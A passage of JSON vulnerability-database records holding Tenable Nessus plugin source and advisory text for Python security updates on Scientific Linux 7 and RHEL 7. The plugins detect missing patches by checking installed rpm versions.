transferred data. 
(CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file descriptors only once.\n\n - When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout.\n\n - The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : python on SL7.x x86_64 (20151119)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:python", "p-cpe:/a:fermilab:scientific_linux:python-debug", "p-cpe:/a:fermilab:scientific_linux:python-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-devel", "p-cpe:/a:fermilab:scientific_linux:python-libs", "p-cpe:/a:fermilab:scientific_linux:python-test", "p-cpe:/a:fermilab:scientific_linux:python-tools", 
"p-cpe:/a:fermilab:scientific_linux:tkinter", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151119_PYTHON_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87570);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n\n script_name(english:\"Scientific Linux Security Update : python on SL7.x x86_64 (20151119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. 
An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a 
connection.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=10966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3f33a7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:09:40", "description": "Updated python packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. 
(CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default, so applying this update does not by itself make HTTPS clients verify certificates; verification has to be enabled explicitly. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. 
(BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-20T00:00:00", "type": "nessus", "title": "RHEL 7 : python (RHSA-2015:2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2020-02-27T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python", "p-cpe:/a:redhat:enterprise_linux:python-debug", "p-cpe:/a:redhat:enterprise_linux:python-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-devel", "p-cpe:/a:redhat:enterprise_linux:python-libs", "p-cpe:/a:redhat:enterprise_linux:python-test", "p-cpe:/a:redhat:enterprise_linux:python-tools", "p-cpe:/a:redhat:enterprise_linux:tkinter", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", 
"cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/86968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86968);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"RHEL 7 : python (RHSA-2015:2101)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. 
A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. 
(BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7185\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:09:56", "description": "From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. 
(CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. 
